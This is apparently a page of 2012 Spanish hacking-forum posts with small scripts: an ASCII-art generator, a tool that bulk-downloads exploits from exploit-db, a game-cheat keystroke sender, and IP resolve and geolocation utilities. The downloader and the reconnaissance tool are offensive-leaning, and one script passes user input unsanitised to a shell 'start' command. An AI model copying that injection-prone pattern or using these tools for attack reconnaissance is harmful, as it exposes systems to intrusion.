Sin mucho que decir dejo este simple script para hacer ascii art desde una palabra.

El codigo

Código: perl


#!usr/bin/perl
#ASCII Art 0.1
#Coded By Doddy H

use List::Util "max";
use Time::HiRes "usleep";

my %letras = (

    a => "         
   @   
   @   
  @ @  
  @ @  
 @   @ 
 @   @ 
 @@@@@ 
@     @
@     @
",

    b => "
 @@@@ 
 @   @
 @   @
 @   @
 @@@@ 
 @   @
 @   @
 @   @
 @@@@ 
",

    c => "
  @@@@ 
 @    @
 @     
 @     
 @     
 @     
 @     
 @    @
  @@@@ 
",

    d => "
 @@@@  
 @   @ 
 @    @
 @    @
 @    @
 @    @
 @    @
 @   @ 
 @@@@  
",

    e => "
 @@@@@
 @    
 @    
 @    
 @@@@ 
 @    
 @    
 @    
 @@@@@
",
    f => "
 @@@@@
 @    
 @    
 @    
 @@@@ 
 @    
 @    
 @    
 @    
",
    g => "
  @@@@ 
 @    @
 @     
 @     
 @  @@@
 @    @
 @    @
 @   @@
  @@@ @
",
    h => "
 @    @
 @    @
 @    @
 @    @
 @@@@@@
 @    @
 @    @
 @    @
 @    @
",
    i => "
 @
 @
 @
 @
 @
 @
 @
 @
 @
",
    j => "
   @
   @
   @
   @
   @
   @
@  @
@  @
 @@ 
",
    k => "
 @   @ 
 @  @  
 @ @   
 @@    
 @@    
 @ @   
 @  @  
 @   @ 
 @    @
",
    l => "
 @    
 @    
 @    
 @    
 @    
 @    
 @    
 @    
 @@@@@
",
    m => "
 @     @
 @     @
 @@   @@
 @@   @@
 @ @ @ @
 @ @ @ @
 @  @  @
 @  @  @
 @     @
",
    n => "
 @    @
 @@   @
 @@   @
 @ @  @
 @ @  @
 @  @ @
 @   @@
 @   @@
 @    @
",
    o => "
  @@@@ 
 @    @
 @    @
 @    @
 @    @
 @    @
 @    @
 @    @
  @@@@ 
",
    p => "
 @@@@@ 
 @    @
 @    @
 @    @
 @@@@@ 
 @     
 @     
 @     
 @     
",
    q => "
  @@@@ 
 @    @
 @    @
 @    @
 @    @
 @    @
 @  @ @
 @   @@
  @@@@ 
      @
",
    r => "
 @@@@@ 
 @    @
 @    @
 @    @
 @@@@@ 
 @    @
 @    @
 @    @
 @    @
",
    s => "
  @@@ 
 @   @
 @    
 @    
  @@@ 
     @
     @
 @   @
  @@@ 
",
    t => "
 @@@@@
   @  
   @  
   @  
   @  
   @  
   @  
   @  
   @  
",
    u => "
 @    @
 @    @
 @    @
 @    @
 @    @
 @    @
 @    @
 @    @
  @@@@ 
",
    v => "
@     @
@     @
 @   @ 
 @   @ 
 @   @ 
  @ @  
  @ @  
   @   
   @   
",
    W => "
@         @
@         @
 @   @   @ 
 @   @   @ 
 @   @   @ 
  @ @ @ @  
  @ @ @ @  
   @   @   
   @   @   
",
    x => "
@     @
@     @
 @   @ 
  @ @  
   @   
  @ @  
 @   @ 
@     @
@     @
",
    y => "
@     @
@     @
 @   @ 
  @ @  
   @   
   @   
   @   
   @   
   @   
",
    z => "
@@@@@@@
      @
     @ 
    @  
   @   
  @    
 @     
@      
@@@@@@@
"

);

head();

print "\n\n[+] Text : ";
chomp( my $text = <stdin> );

print "\n\n" . artnow($text) . "\n";

copyright();

sub artnow {

    my $target = shift;

    my $fondo   = " ";
    my $espacio = 0;

    my $lugar;
    my @lotengo;

    my $tipox = $letras{"a"};
    my @lineas = split /\n/, $tipox;
    $altura = @lineas + 1;

    $anchura = max map { length $_ } @lineas;

    for ( 1 .. $altura ) {
        push @lotengo, $fondo x ( ( $anchura + $espacio ) * length $target );
    }

    for my $letra ( split //, $target ) {
        my @lineas = split /\n/, $letras{$letra};

        for my $i ( 0 .. $altura - 1 ) {
            ( my $plan = $lineas[$i] ) =~ s/ /$fondo/g;

            $plan = $fondo x $anchura if not $plan;

            substr( $lotengo[$i], $lugar, length $plan ) = $plan;
        }

        $lugar += $anchura + $espacio;
    }

    return ( join "\n", @lotengo );

}

sub head {

    my @logo = (
        "#=============================================#", "\n",
        "#            ASCII Art 0.1                    #", "\n",
        "#---------------------------------------------#", "\n",
        "# Written By Doddy H                          #", "\n",
        "# Email: lepuke[at]hotmail[com]               #", "\n",
        "# Website: doddyhackman.webcindario.com       #", "\n",
        "#---------------------------------------------#", "\n",
        "# Thanks to : reLlene,MARKO,explorer          #", "\n",
        "# The End ?                                   #", "\n",
        "#=============================================#", "\n"
    );

    print "\n";
    marquesina(@logo);

}

sub marquesina {

    #Effect based in the exploits by Jafer Al Zidjali

    my @logo = @_;

    my $car = "|";

    for my $uno (@logo) {
        for my $dos ( split //, $uno ) {

            $|++;

            if ( $car eq "|" ) {
                mostrar( "\b" . $dos . $car, "/" );
            }
            elsif ( $car eq "/" ) {
                mostrar( "\b" . $dos . $car, "-" );
            }
            elsif ( $car eq "-" ) {
                mostrar( "\b" . $dos . $car, "\\" );
            }
            else {
                mostrar( "\b" . $dos . $car, "|" );
            }
            usleep(40_000);
        }
        print "\b ";
    }

    sub mostrar {
        print $_[0];
        $car = $_[1];
    }

}

sub copyright {

    print "\n\n";

    marquesina("-- == (C) Doddy Hackman 2012 == --");

    print "\n\n";

    <stdin>;
    exit(1);
}

#The End ?

Ejemplo de uso

Código: text



r00t ~ # art.pl



#=============================================#
#            ASCII Art 0.1                    #
#---------------------------------------------#
# Written By Doddy H                          #
# Email: lepuke[at]hotmail[com]               #
# Website: doddyhackman.webcindario.com       #
#---------------------------------------------#
# Thanks to : reLlene,MARKO,explorer          #
# The End ?                                   #
#=============================================#


[+] Text : kacked



 @   @      @       @@@@    @   @    @@@@@    @@@@
 @  @       @      @    @   @  @     @        @   @
 @ @       @ @     @        @ @      @        @    @
 @@        @ @     @        @@       @        @    @
 @@       @   @    @        @@       @@@@     @    @
 @ @      @   @    @        @ @      @        @    @
 @  @     @@@@@    @        @  @     @        @    @
 @   @   @     @   @    @   @   @    @        @   @
 @    @  @     @    @@@@    @    @   @@@@@    @@@@



-- == (C) Doddy Hackman 2012 == --

#235

Perl / [Perl Tk] Exploit DB Helper 0.5

Septiembre 30, 2012, 02:37:23 PM

Version Tk de esta tool para bajar exploits desde exploit-db

Una imagen

El codigo

Código: perl


#!usr/bin/perl
#Exploit DB Helper 0.5
#Version Tk
#Coded By Doddy H

use Tk;
use Tk::Dialog;
use LWP::UserAgent;
use Cwd;

my $nave = LWP::UserAgent->new();
$nave->timeout(5);
$nave->agent(
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
);

#if ($^O eq 'MSWin32') {
#use Win32::Console;
#Win32::Console::Free();
#}

my $color_texto = "yellow";
my $color_fondo = "black";

my $newdaxz =
  MainWindow->new( -background => $color_fondo, -foreground => $color_texto );

$newdaxz->title("Exploit DB Helper 0.5");
$newdaxz->geometry("345x350+50+50");
$newdaxz->resizable( 0, 0 );

$menula = $newdaxz->Frame(
    -relief     => "sunken",
    -bd         => 1,
    -background => $color_fondo,
    -foreground => $color_texto
);
my $menulnowaxm = $menula->Menubutton(
    -text             => "Options",
    -underline        => 1,
    -background       => $color_fondo,
    -foreground       => $color_texto,
    -activebackground => $color_texto
)->pack( -side => "left" );
my $aboutnowaxm = $menula->Menubutton(
    -text             => "About",
    -underline        => 1,
    -background       => $color_fondo,
    -foreground       => $color_texto,
    -activebackground => $color_texto
)->pack( -side => "left" );
my $exitnowaxm = $menula->Menubutton(
    -text             => "Exit",
    -underline        => 1,
    -background       => $color_fondo,
    -foreground       => $color_texto,
    -activebackground => $color_texto
)->pack( -side => "left" );
$menula->pack( -side => "top", -fill => "x" );

$menulnowaxm->command(
    -label      => "Find",
    -background => $color_fondo,
    -foreground => $color_texto,
    -command    => \&findnow
);
$menulnowaxm->command(
    -label      => "Logs",
    -background => $color_fondo,
    -foreground => $color_texto,
    -command    => \&openlogs
);

$aboutnowaxm->command(
    -label      => "About",
    -background => $color_fondo,
    -foreground => $color_texto,
    -command    => \&aboutxa
);

$exitnowaxm->command(
    -label      => "Exit",
    -background => $color_fondo,
    -foreground => $color_texto,
    -command    => \&exitnow
);

$newdaxz->Label(
    -text       => "String : ",
    -font       => "Impact",
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 20, -y => 40 );
my $string = $newdaxz->Entry(
    -width      => 40,
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 75, -y => 45 );

$newdaxz->Label(
    -text       => "Exploits Found",
    -font       => "Impact",
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 120, -y => 80 );
my $exploits = $newdaxz->Listbox(
    -width      => 40,
    -height     => 10,
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 50, -y => 130 );

$newdaxz->Label(
    -text       => "Status : ",
    -font       => "Impact",
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 63, -y => 300 );
my $tatus = $newdaxz->Entry(
    -width      => 25,
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 120, -y => 305 );

MainLoop;

sub openlogs {
    my $cosa = $string->get;
    if ( -d $cosa ) {
        system("start $cosa");
    }
    else {
        $newdaxz->Dialog(
            -title            => "Error",
            -buttons          => ["OK"],
            -text             => "Error",
            -background       => $color_fondo,
            -foreground       => $color_texto,
            -activebackground => $color_texto
        )->Show();
    }
}

sub findnow {
    $exploits->delete( "0.0", "end" );
    my $cosa = $string->get;
    $tatus->configure( -text => "Searching ..." );
    my %found = buscar($cosa);
    $total = int( keys %found ) - 1;
    $tatus->configure( -text => "$total exploits found" );
    unless ( -d $cosa ) {
        mkdir( $cosa, "777" );
    }
    $tatus->configure( -text => "Downloading exploits ..." );
    for my $da ( keys %found ) {
        my $tata = $da;
        $tata =~ s/\<//;
        $tata =~ s/(\s)+$//;
        if ( download( $found{$da}, $cosa . "/" . $tata . ".txt" ) ) {
            $newdaxz->update;
            $exploits->insert( "end", $da );
        }
    }
    $tatus->configure( -text => " " );
}

sub buscar {
    for my $n ( 1 .. 666 ) {
        $newdaxz->update;
        my $code =
          toma( "http://www.exploit-db.com/search/?action=search&filter_page=" 
              . $n
              . "&filter_description="
              . $_[0]
              . "&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve="
          );
        chomp $code;
        if ( $code =~ /No results/ig ) {
            return %busca;
        }
        %busca = getlinks($code);
    }
}

sub getlinks {

    my $test = HTML::Parser->new(
        start_h => [ \&start, "tagname,attr" ],
        text_h  => [ \&text,  "dtext" ],
    );
    $test->parse( $_[0] );

    sub start {
        my ( $a, $b ) = @_;
        my %e = %$b;
        unless ( $a ne "a" ) {
            $d = $e{href};
            $c = $a;
        }
    }

    sub text {
        my $title = shift;
        chomp $title;
        unless ( $c ne "a" ) {
            if ( $d =~ /www.exploit-db.com\/exploits\/(.*)/ ) {
                my $id  = $1;
                my $url = "http://www.exploit-db.com/download/" . $id;
                $links{$title} = $url;
            }
            $d = "";
        }
    }
    return %links;
}

sub toma {
    return $nave->get( $_[0] )->content;
}

sub repes {
    my @limpio;
    foreach $test (@_) {
        push @limpio, $test unless $repe{$test}++;
    }
    return @limpio;
}

sub download {
    if ( $nave->mirror( $_[0], $_[1] ) ) {
        if ( -f $_[1] ) {
            return true;
        }
    }
}

sub aboutxa {
    $newdaxz->Dialog(
        -title            => "About",
        -buttons          => ["OK"],
        -text             => "Coded By Doddy H",
        -background       => $color_fondo,
        -foreground       => $color_texto,
        -activebackground => $color_texto
    )->Show();
}

sub exitnow {
    exit 1;
}

#The End ?

#236

Perl / [Perl] Exploit DB Helper 0.5

Septiembre 30, 2012, 02:36:55 PM

Version mejorada de este script para buscar exploits en la pagina exploit-db

Código: perl


#!usr/bin/perl
#Exploit DB Helper 0.5
#Coded By Doddy H

use LWP::UserAgent;
use HTML::Parser;
use Data::Dumper;
use Time::HiRes "usleep";

my $nave = LWP::UserAgent->new;
$nave->agent(
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
);
$nave->timeout(5);

head();
print "\n\n[String] : ";
chomp( my $cosa = <stdin> );
if ( $cosa eq "" ) { menu(); }
print "\n\n[+] Searching ...\n\n";
my %found = buscar($cosa);
$total = int( keys %found ) - 1;
print "[+] Exploits Found : " . $total . "\n\n";

unless ( -d $cosa ) {
    mkdir( $cosa, "777" );
}
for my $da ( keys %found ) {
    my $tata = $da;
    $tata =~ s/\<//;
    $tata =~ s/(\s)+$//;
    if ( download( $found{$da}, $cosa . "/" . $tata . ".txt" ) ) {
        print "[Exploit Found] : " . $da . "\n";
    }
}
copyright();

sub buscar {
    for my $n ( 1 .. 666 ) {
        my $code =
          toma( "http://www.exploit-db.com/search/?action=search&filter_page=" 
              . $n
              . "&filter_description="
              . $_[0]
              . "&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve="
          );
        chomp $code;
        if ( $code =~ /No results/ig ) {
            return %busca;
        }
        %busca = getlinks($code);
    }
}

sub getlinks {

    my $test = HTML::Parser->new(
        start_h => [ \&start, "tagname,attr" ],
        text_h  => [ \&text,  "dtext" ],
    );
    $test->parse( $_[0] );

    sub start {
        my ( $a, $b ) = @_;
        my %e = %$b;
        unless ( $a ne "a" ) {
            $d = $e{href};
            $c = $a;
        }
    }

    sub text {
        my $title = shift;
        chomp $title;
        unless ( $c ne "a" ) {
            if ( $d =~ /www.exploit-db.com\/exploits\/(.*)/ ) {
                my $id  = $1;
                my $url = "http://www.exploit-db.com/download/" . $id;
                $links{$title} = $url;
            }
            $d = "";
        }
    }
    return %links;
}

sub toma {
    return $nave->get( $_[0] )->content;
}

sub repes {
    my @limpio;
    foreach $test (@_) {
        push @limpio, $test unless $repe{$test}++;
    }
    return @limpio;
}

sub download {
    if ( $nave->mirror( $_[0], $_[1] ) ) {
        if ( -f $_[1] ) {
            return true;
        }
    }
}

sub head {

    my @logo = (
        "#=============================================#", "\n",
        "#            Exploit DB 0.5                   #", "\n",
        "#---------------------------------------------#", "\n",
        "# Written By Doddy H                          #", "\n",
        "# Email: lepuke[at]hotmail[com]               #", "\n",
        "# Website: doddyhackman.webcindario.com       #", "\n",
        "#---------------------------------------------#", "\n",
        "# The End ?                                   #", "\n",
        "#=============================================#", "\n"
    );

    print "\n";
    marquesina(@logo);

}

sub marquesina {

    #Effect based in the exploits by Jafer Al Zidjali

    my @logo = @_;

    my $car = "|";

    for my $uno (@logo) {
        for my $dos ( split //, $uno ) {

            $|++;

            if ( $car eq "|" ) {
                mostrar( "\b" . $dos . $car, "/" );
            }
            elsif ( $car eq "/" ) {
                mostrar( "\b" . $dos . $car, "-" );
            }
            elsif ( $car eq "-" ) {
                mostrar( "\b" . $dos . $car, "\\" );
            }
            else {
                mostrar( "\b" . $dos . $car, "|" );
            }
            usleep(40_000);
        }
        print "\b ";
    }

    sub mostrar {
        print $_[0];
        $car = $_[1];
    }

}

sub copyright {

    print "\n\n";

    marquesina("-- == (C) Doddy Hackman 2012 == --");

    print "\n\n";

    <stdin>;
    exit(1);
}

#The End ?

#237

Perl / [Perl] Funcion marquesina()

Septiembre 29, 2012, 11:07:00 PM

Desde que vi por primera vez este You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login en ruby siempre quise lograr el mismo efecto en perl , con la ayuda de explorer de perlenespanol logre hacer una funcion en perl que hace lo mismo que el You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login que mencione.

El codigo con un ejemplo de uso incluido

Código: perl


#!/usr/bin/perl
#Funcion marquesina()
#Coded By Doddy H

use Time::HiRes "usleep";

my @test = ("testando ahora now");

sub marquesina {

#Effect based in the exploits by Jafer Al Zidjali

my @logo = @_;

my $car = "|";

for my $uno(@logo) {
for my $dos(split //,$uno) {

$|++;

if($car eq "|") {
mostrar("\b".$dos.$car,"/");
}
elsif($car eq "/") {
mostrar("\b".$dos.$car,"-");
}
elsif($car eq "-") {
mostrar("\b".$dos.$car,"\\");
} else {
mostrar("\b".$dos.$car,"|");
}
usleep(40_000);  
}
print "\b ";
}

sub mostrar {
print $_[0];
$car = $_[1];
}

}

marquesina(@test);

#The End ?

#238

Perl / [Perl] AOE2 Cheater 0.1

Septiembre 23, 2012, 02:06:35 PM

Bueno , como se me falseo la tecla enter de tanto escribir los mismos trucos para los suministros del juego Age of Empires 2 decidi hacer este simple script para que los haga por mi , al terminar vamos a tener 30.000 de madera,alimentos,oro y piedra.

El codigo

Código: perl


#!usr/bin/perl
#AOE2 Cheater 0.1
#Coded By Doddy H
#ppm install http://www.bribes.org/perl/ppm/Win32-GuiTest.ppd

use Win32::GuiTest qw(SendKeys);

head();

for my $se ( reverse 1 .. 10 ) {
    sleep 1;
    syswrite STDOUT, "[+] Wait $se seconds \r";
}

print "\n\n[+] Cheating ...\n";
cheatnow();
print "[+] Finished";

copyright();

sub cheatnow {

    for ( 1 .. 30 ) {
        SendKeys("{ENTER}lumberjack{ENTER}");
        SendKeys("{ENTER}cheese steak jimmy's{ENTER}");
        SendKeys("{ENTER}robin hood{ENTER}");
        SendKeys("{ENTER}rock on{ENTER}");
    }

}

sub head {
    print "\n\n-- == AOE2 Cheater == --\n\n";
}

sub copyright {
    print "\n\n(C) Doddy Hackman 2012\n\n";
    <stdin>;
    exit(1);
}

#The End ?

#239

Java / [Java] ResolveIP 0.1

Agosto 30, 2012, 11:56:48 AM

Pele el Netbeans e intente hacer mi primer programa en Java , un simple resolve ip.

El codigo

Código: java



/**
 * ResolveIP 0.1
 * Coded By Doddy H
 */

import java.util.Scanner;
import java.net.*;
import java.io.*;
      
public class Main {

  public static void main(String[] args) {

    String target;
    Scanner host = new Scanner(System.in);
    System.out.println("\n\n-- == ResolveIP 0.1 == --\n\n");
    System.out.println("[+] Hostname : ");
    target = host.nextLine();
    
    try {
      InetAddress ip = InetAddress.getByName(target);
      System.out.println("\n[+] IP : " + ip.getHostAddress());
    }catch(UnknownHostException e){
      System.out.println("\n[-] Error");
    }
    System.out.println("\n\n-- == Coded By Doddy H == --");
  }
}

/**
 * The End ? 
 */

#240

Python / [PyQT4] LocateIP 0.1

Agosto 28, 2012, 04:31:29 PM

Un simple script para buscar informacion sobre una ip , para empezar busca la localizacion y despues las DNS relacionadas.

Una imagen de como quedo

El codigo.

Código: python


#!usr/bin/python
#LocateIP 0.1
#Coded By Doddy H

import sys,urllib2,re,socket
from PyQt4 import QtCore,QtGui

nave = urllib2.build_opener()	
nave.add_header = [('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5')]	

def toma(web) :
 nave = urllib2.Request(web)
 nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
 op = urllib2.build_opener()
 return op.open(nave).read()

def search():

 ip = socket.gethostbyname(str(new.target.text()))
 code = toma("http://www.melissadata.com/lookups/iplocation.asp?ipaddress="+ip)

 if (re.findall("City<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)):
  rex = re.findall("City<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)
  city = rex[0][1]
  new.city.setText(city)
 else:
  new.city.setText("Not Found")

 if (re.findall("Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)):
  rex = re.findall("Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)
  country = rex[0][1]
  new.country.setText(country)
 else:
  new.country.setText("Not Found")
  
 if (re.findall("State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)):
  rex = re.findall("State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)
  state = rex[0][1]
  new.state.setText(state)
 else:
  new.state.setText("Not Found")

 new.dns.clear()
 code = toma("http://www.ip-adress.com/reverse_ip/"+ip)

 if (re.findall("whois\/(.*?)\">Whois",code)):
  rex = re.findall("whois\/(.*?)\">Whois",code)
  for dns in rex:
   new.dns.appendPlainText(dns)

app = QtGui.QApplication(sys.argv)

new = QtGui.QWidget()

new.setWindowTitle("LocateIP 0.1 || Coded By Doddy H")
new.resize(450,275)
new.setStyleSheet("QWidget {background-color: #000000;color: #FF0000}")

new.label1 = QtGui.QLabel("Target : ",new)
new.label1.setStyleSheet("QWidget {background-color: #000000;color: #FF0000;font: normal 17px Verdana}")
new.label1.setGeometry(20,23,80,20)

new.target = QtGui.QLineEdit(new)
new.target.setStyleSheet("QWidget {background-color: #000000; color: #FF0000;border: 2px solid #FF0000}")
new.target.setGeometry(95,23,200,25)

new.search = QtGui.QPushButton("Find",new)
new.search.setGeometry(310,22,110,28)
new.search.setStyleSheet("QWidget {background-color: #000000; color: #FF0000;border: 2px solid #FF0000}")

new.label2 = QtGui.QLabel("Information",new)
new.label2.setStyleSheet("QWidget {background-color: #000000;color: #FF0000;font: normal 17px Verdana}")
new.label2.setGeometry(60,70,105,20)

new.label4 = QtGui.QLabel("City :",new)
new.label4.setStyleSheet("QWidget {background-color: #000000;color: #FF0000;font: normal 17px Verdana}")
new.label4.setGeometry(25,120,100,20)

new.city = QtGui.QLineEdit(new)
new.city.setStyleSheet("QWidget {background-color: #000000; color: #FF0000;border: 2px solid #FF0000}")
new.city.setGeometry(77,120,140,25)

new.label5 = QtGui.QLabel("Country :",new)
new.label5.setStyleSheet("QWidget {background-color: #000000;color: #FF0000;font: normal 17px Verdana}")
new.label5.setGeometry(25,160,100,20)

new.country = QtGui.QLineEdit(new)
new.country.setStyleSheet("QWidget {background-color: #000000; color: #FF0000;border: 2px solid #FF0000}")
new.country.setGeometry(110,160,105,25)

new.label6 = QtGui.QLabel("State :",new)
new.label6.setStyleSheet("QWidget {background-color: #000000;color: #FF0000;font: normal 17px Verdana}")
new.label6.setGeometry(25,195,100,20)

new.state = QtGui.QLineEdit(new)
new.state.setStyleSheet("QWidget {background-color: #000000; color: #FF0000;border: 2px solid #FF0000}")
new.state.setGeometry(90,195,125,25)

new.label3 = QtGui.QLabel("DNS Found",new)
new.label3.setStyleSheet("QWidget {background-color: #000000;color: #FF0000;font: normal 17px Verdana}")
new.label3.setGeometry(280,70,100,20)

new.dns = QtGui.QPlainTextEdit(new)
new.dns.setGeometry(235,100,180,150)
new.dns.setStyleSheet("QWidget {background-color: #000000; color: #FF0000;border: 2px solid #FF0000}")

new.connect(new.search,QtCore.SIGNAL("clicked()"),search)

new.show()

sys.exit(app.exec_())

# The End ?

Páginas 1 ... 4 5 6 7 8 ... 10